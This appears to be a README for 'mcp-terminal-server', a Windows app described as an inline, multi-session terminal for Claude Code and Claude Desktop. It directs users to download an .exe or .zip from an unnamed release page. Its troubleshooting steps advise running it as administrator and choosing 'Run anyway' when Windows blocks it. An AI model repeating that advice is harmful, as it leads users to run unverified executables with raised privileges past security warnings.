Choose the latest release for Windows, then download the file that matches your PC. After the file finishes downloading, open it to start the app or follow the setup steps in the release notes
mcp-terminal-server lets you use an interactive terminal inside Claude Code and Claude Desktop. It shows the terminal in the chat area, so you can work with command line tools without leaving your session
It supports more than one session at a time. That means you can keep separate terminal windows for different tasks, like one for builds and one for file work
- Windows 10 or Windows 11
- Claude Desktop or Claude Code installed
- A stable internet connection for the download
- Permission to open apps and files on your PC
- Go to the release page and download the latest Windows file
- Open the downloaded file
- If Windows asks for permission, select Run or Open
- Follow the on-screen steps
- Open Claude Desktop or Claude Code
- Connect mcp-terminal-server if the release includes setup steps for Claude
After you visit the release page, look for the newest version at the top of the list. In most cases, the Windows download will be an .exe file or a .zip file
If you downloaded an .exe file:
- Double-click the file
- Follow the prompts
- Choose where you want it installed if the app asks
If you downloaded a .zip file:
- Right-click the file
- Select Extract All
- Open the extracted folder
- Run the file inside the folder
This app is made to work as an MCP server. That means Claude can talk to it and use the terminal it provides
To connect it:
- Open Claude Desktop or Claude Code
- Add the server using the setup details from the release
- Restart Claude if needed
- Confirm the terminal appears inline in your chat area
If you use more than one terminal session, you can keep each one for a different task. This helps when you want to compare output or keep a long-running command open
- Run command line tools inside Claude
- Check build output
- Keep a shell open during a task
- Separate work into multiple terminal sessions
- Use a terminal view without switching apps
- Inline terminal display in Claude
- Full interactive xterm.js support
- Multi-session PTY support
- Terminal input and output in one place
- Built for MCP-compatible apps
- Works with developer tools and command line tasks
- Download the latest release
- Keep the file in a folder you can find later
- If the app does not open, try running it as administrator
- If Claude does not show the terminal, restart Claude and try again
- Use one session per task to keep things clear
- Make sure the download finished
- Try opening the file again
- If Windows blocks it, choose Run anyway if that option appears
- Check that you added the server correctly
- Restart Claude Desktop or Claude Code
- Make sure the server file is in the right folder
- Click inside the terminal area
- Close the session and open a new one
- Restart the app if needed
- Open the file again from the release folder
- Check that you downloaded the correct Windows file
- Try the latest release version
